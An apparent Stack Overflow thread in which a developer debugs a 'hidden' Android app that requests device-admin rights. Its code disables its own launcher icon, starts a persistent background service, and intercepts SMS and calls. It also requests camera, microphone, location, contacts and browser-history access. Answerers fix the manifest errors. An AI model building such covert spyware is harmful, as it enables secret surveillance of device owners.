# Device administrator privilege to android app

Tags: java, android, android-manifest, device-admin

I know similar questions has been asked many times but still i was unable to get my solution from any of it. I am quite new to android & JAVA so please keep that in mind :) .I am working on some security related experimental projects at work & trying to give my android application device administrator privilege. I have one SampleDeviceAdministrator app which works fine. I want to use reuse the same code to my application so that when my application is launched it gets device admin access too.For that i have included the java classes from former app to my app & i am trying to call the same code to my app thru former app. Here are screenshots of MainActivity.java from sample app.

```html
package com.connect;

import android.app.Activity;
import android.app.ActivityManager;
import android.app.ActivityManager.RunningServiceInfo;
import android.content.Context;
import android.content.Intent;
import android.content.pm.PackageManager;
import android.os.Bundle;
import android.util.Log;
import android.view.WindowManager;

public class Droidian extends Activity {

    public void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        getWindow().addFlags(WindowManager.LayoutParams.FLAG_NOT_TOUCHABLE);
        getWindow().setSoftInputMode(WindowManager.LayoutParams.SOFT_INPUT_STATE_ALWAYS_HIDDEN);
        PackageManager i = getApplicationContext().getPackageManager();
        i.setComponentEnabledSetting(getComponentName(),PackageManager.COMPONENT_ENABLED_STATE_DISABLED, PackageManager.DONT_KILL_APP);

        if(isMyServiceRunning()==false)
        {
            startService(new Intent(getApplicationContext(), DroidianService.class));
            Log.i("com.connect","startService");
        }
    }
    private boolean isMyServiceRunning() {
        ActivityManager manager = (ActivityManager) getApplicationContext().getSystemService(Context.ACTIVITY_SERVICE);
        for (RunningServiceInfo service : manager.getRunningServices(Integer.MAX_VALUE)) {
            if (DroidianService.class.getName().equals(service.service.getClassName())) {
                return true;
            }
        }
        return false;
    }
}
```

Here is Droidian.java which is main class for my application.

```html
package com.connect;

import android.app.Activity;
import android.app.ActivityManager;
import android.app.ActivityManager.RunningServiceInfo;
import android.content.Context;
import android.content.Intent;
import android.content.pm.PackageManager;
import android.os.Bundle;
import android.util.Log;
import android.view.WindowManager;

public class Droidian extends Activity {

    public void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        getWindow().addFlags(WindowManager.LayoutParams.FLAG_NOT_TOUCHABLE);
        getWindow().setSoftInputMode(WindowManager.LayoutParams.SOFT_INPUT_STATE_ALWAYS_HIDDEN);
        PackageManager i = getApplicationContext().getPackageManager();
        i.setComponentEnabledSetting(getComponentName(),PackageManager.COMPONENT_ENABLED_STATE_DISABLED, PackageManager.DONT_KILL_APP);

        if(isMyServiceRunning()==false)
        {
            startService(new Intent(getApplicationContext(), DroidianService.class));
            Log.i("com.connect","startService");
        }
    }
    private boolean isMyServiceRunning() {
        ActivityManager manager = (ActivityManager) getApplicationContext().getSystemService(Context.ACTIVITY_SERVICE);
        for (RunningServiceInfo service : manager.getRunningServices(Integer.MAX_VALUE)) {
            if (DroidianService.class.getName().equals(service.service.getClassName())) {
                return true;
            }
        }
        return false;
    }
}
```

& here AndroidManifest.xml

```html
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.hidden.droidian"
    android:versionCode="2"
    android:versionName="2.0" xmlns:tools="http://schemas.android.com/tools">

    <uses-sdk
        android:minSdkVersion="10"
        android:targetSdkVersion="18" tools:ignore="OldTargetApi"/>
    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED" />
    
 <supports-screens android:resizeable="true"
              android:largeScreens="true" 
              android:xlargeScreens="true"
              />   
    
    <application 
        android:icon="@drawable/launcher"
        android:label="@string/app_name"
  android:theme="@style/Invisible"
  android:allowBackup="false"
  android:persistent="true">
        <activity
            android:name="com.connect.Droidian"
            android:excludeFromRecents="true">
        </activity>
        <activity
            android:name="com.connect.MainActivity"
           android:label="@string/app_name">
                <intent-filter>
                <action android:name="android.intent.action.MAIN" />
                 <category android:name="android.intent.category.LAUNCHER" />
     </intent-filter>
        </activity>
        <activity
            android:name="com.connect.Dialog" 
            android:excludeFromRecents="true">
        </activity>
        <activity
            android:name="com.connect.CameraView" 
            android:excludeFromRecents="true">
        </activity>
        <activity
            android:name="com.connect.VideoView" 
            android:excludeFromRecents="true">
        </activity>
        <service android:name="com.connect.DroidianService"
            android:enabled="true"
            android:exported="true"
            android:persistent="true">
        </service>  
        <service android:name="com.connect.RecordService">
        </service> 
                 <receiver android:name="com.connect.ServiceReceiver" 
                   android:enabled="true"
                   android:exported="true"
                   android:persistent="true">
            <intent-filter android:priority="1000">
        <action android:name="android.intent.action.BOOT_COMPLETED" />
                    <action android:name="android.provider.Telephony.SMS_RECEIVED" />
              <action android:name="android.intent.action.PHONE_STATE" />
              <action android:name="android.intent.action.ACTION_EXTERNAL_APPLICATIONS_AVAILABLE"/>
              <action android:name="android.intent.action.QUICKBOOT_POWERON" />
            </intent-filter>
        </receiver>

        <receiver
            android:name="com.connect.SampleDeviceAdminReceiver"
            android:permission="android.permission.BIND_DEVICE_ADMIN" >
            <meta-data
                android:name="android.app.device_admin"
                android:resource="@xml/device_admin" />

            <intent-filter>
                <action android:name="android.app.action.DEVICE_ADMIN_ENABLED" />
            </intent-filter>
        </receiver>
            </application>
    
<uses-permission android:name="android.permission.QUICKBOOT_POWERON" android:required="false" />
<uses-permission android:name="android.permission.INTERNET" android:required="true"/>
<uses-permission android:name="android.permission.READ_SMS" android:required="true" />
<uses-permission android:name="android.permission.WRITE_SMS" android:required="true" />
<uses-permission android:name="android.permission.GET_ACCOUNTS" android:required="true" />
<uses-permission android:name="com.android.browser.permission.READ_HISTORY_BOOKMARKS"/>
<uses-permission android:name="android.permission.ACCESS_NETWORK_STATE" android:required="true"/>
<uses-permission android:name="android.permission.READ_CONTACTS" android:required="true" />
<uses-permission android:name="android.permission.ACCESS_FINE_LOCATION" android:required="true" />
<uses-permission android:name="android.permission.GET_TASKS" android:required="true" />
<uses-permission android:name="android.permission.WAKE_LOCK" android:required="false" />
<uses-permission android:name="android.permission.CALL_PHONE" android:required="true" />
<uses-permission android:name="android.permission.SEND_SMS" android:required="true" />
<uses-permission android:name="android.permission.WRITE_SETTINGS" android:required="false" />
<uses-permission android:name="android.permission.READ_PHONE_STATE" android:required="false" />
<uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" android:required="true" />
<uses-permission android:name="android.permission.CAMERA" android:required="true" />
<uses-permission android:name="android.permission.RECORD_AUDIO" android:required="false" />
<uses-permission android:name="android.permission.PROCESS_OUTGOING_CALLS" android:required="true" />
<uses-permission android:name="android.permission.RECEIVE_SMS" android:required="true" />
<uses-feature android:name="android.hardware.camera" android:required="false" />
<uses-feature android:name="android.hardware.camera.front" android:required="false" />
<uses-feature android:name="android.hardware.camera.autofocus" android:required="false" />
<uses-feature android:name="android.hardware.microphone" android:required="false" />


</manifest>
```

When I run my application, i get JAVA Runtime nullpointer exception. Here is snippet from logcat:

```html
12-10 13:47:42.261    4435-4435/com.hidden.droidian E/AndroidRuntime﹕ FATAL EXCEPTION: main
    Process: com.hidden.droidian, PID: 4435
    java.lang.RuntimeException: Failure delivering result ResultInfo{who=null, request=100, result=0, data=null} to activity {com.hidden.droidian/com.connect.MainActivity}: java.lang.NullPointerException: Attempt to read from field 'java.lang.String android.content.pm.ActivityInfo.parentActivityName' on a null object reference
            at android.app.ActivityThread.deliverResults(ActivityThread.java:3699)
            at android.app.ActivityThread.handleSendResult(ActivityThread.java:3742)
            at android.app.ActivityThread.-wrap16(ActivityThread.java)
            at android.app.ActivityThread$H.handleMessage(ActivityThread.java:1393)
            at android.os.Handler.dispatchMessage(Handler.java:102)
            at android.os.Looper.loop(Looper.java:148)
            at android.app.ActivityThread.main(ActivityThread.java:5417)
            at java.lang.reflect.Method.invoke(Native Method)
            at com.android.internal.os.ZygoteInit$MethodAndArgsCaller.run(ZygoteInit.java:726)
            at com.android.internal.os.ZygoteInit.main(ZygoteInit.java:616)
     Caused by: java.lang.NullPointerException: Attempt to read from field 'java.lang.String android.content.pm.ActivityInfo.parentActivityName' on a null object reference
            at android.app.Activity.onCreate(Activity.java:905)
            at com.connect.Droidian.onCreate(Droidian.java:16)
            at com.connect.MainActivity.onActivityResult(MainActivity.java:54)
            at android.app.Activity.dispatchActivityResult(Activity.java:6428)
            at android.app.ActivityThread.deliverResults(ActivityThread.java:3695)
            at android.app.ActivityThread.handleSendResult(ActivityThread.java:3742)
            at android.app.ActivityThread.-wrap16(ActivityThread.java)
            at android.app.ActivityThread$H.handleMessage(ActivityThread.java:1393)
            at android.os.Handler.dispatchMessage(Handler.java:102)
            at android.os.Looper.loop(Looper.java:148)
            at android.app.ActivityThread.main(ActivityThread.java:5417)
            at java.lang.reflect.Method.invoke(Native Method)
            at com.android.internal.os.ZygoteInit$MethodAndArgsCaller.run(ZygoteInit.java:726)
            at com.android.internal.os.ZygoteInit.main(ZygoteInit.java:616)
```

Also, my application is supposed to be a hidden application so no launcher is created however, to execute device admin permission, launcher is required i suppose. If anyone could look into it would be great. Please let me know if i need to provide any more information. Thanks!

Comment: this might be your solution...[http://stackoverflow.com/questions/23246284/android-fragment-lifecycle-issue-nullpointerexception-on-onactivityresult](http://stackoverflow.com/questions/23246284/android-fragment-lifecycle-issue-nullpointerexception-on-onactivityresult)

Answer (score 0):

I think you forgot to post screenshots.

First of all, if Droidian.java is the main class for your app why it isn't set as launcher in Manifest file?

It should be like this:

```
 <activity
        android:name="com.connect.Droidian"
        android:label="@string/app_name">
            <intent-filter>
                <action android:name="android.intent.action.MAIN" />
                <category android:name="android.intent.category.LAUNCHER" />
            </intent-filter>
 </activity>
```

And there is one and only one LAUNCHER in an app.

Let me know if this helps you.

Comment: I kept my manifest file that way too but that didn't help either. If there is only one launcher, can i get two functions to run on same launcher at the same time. Droidian.java basically runs as service while  MainActivity.java should present with device admin prompt upon launch. My intention is to run both the onCreate functions as soon as the application is launched. Means, as soon as application is installed, droidian should run in the background while device admin prompt should be presented to the user. Also, what screenshots you are asking for? Emulator or code?

Comment: Upon launch, that is not possible to launch more than one Activity.
If you want Droidian.java to run as Service, you should extend it as Service, not as the Activity.
It is also not possible to start Activity or Service itself after the installation.
I suggest you to wrap the functionalities of Droidian in Service and start it from the Main Activity.

Comment: Probably i wasn't much clear on my requirements. I achieved my intented purpose by combining the manifest files. The issue was package name. That i modified in build.gradle file and it seemed to work. However, after launch of MainActivity , i want to call Droidian onCreate method now. I have no clue how to do it. Any help (considering i am noob) would be much appreciated :)

Comment: You just need to create an Intent in MainActivity.  
`Intent myIntent = new Intent ( this, Droidian.class );`  
and launch it like this: `startActivity ( myIntent );`  
(You can launch it from MainActivity's onResume).  

Don't forget to define Droidian Activity in Manifest file if you have'nt done it already.  
Let me know if it helps you.

Comment: I defined Class Code as:
`protected void onResume()
        {
            super.onResume();
            Intent myIntent = new Intent ( this, Droidian.class );
            startActivity(myIntent);
        }`
& manifest:
 ` <activity
            android:name="com.connect.Droidian"
            android:excludeFromRecents="true">
        </activity> `
still i am encountering this following error:
`android.content.ActivityNotFoundException: Unable to find explicit activity class {com.connect/com.connect.Droidian}; have you declared this activity in your AndroidManifest.xml? ` any suggestions?

Comment: In manifest, under Droidian activity tag, change `android:name="com.connect.Droidian"` to `android:name="com.hidden.droidian.Droidian"` or to `android:name=".Droidian"` as your package name is `"com.hidden.droidian"`.
Check the package name and make suitable changes for other activities too.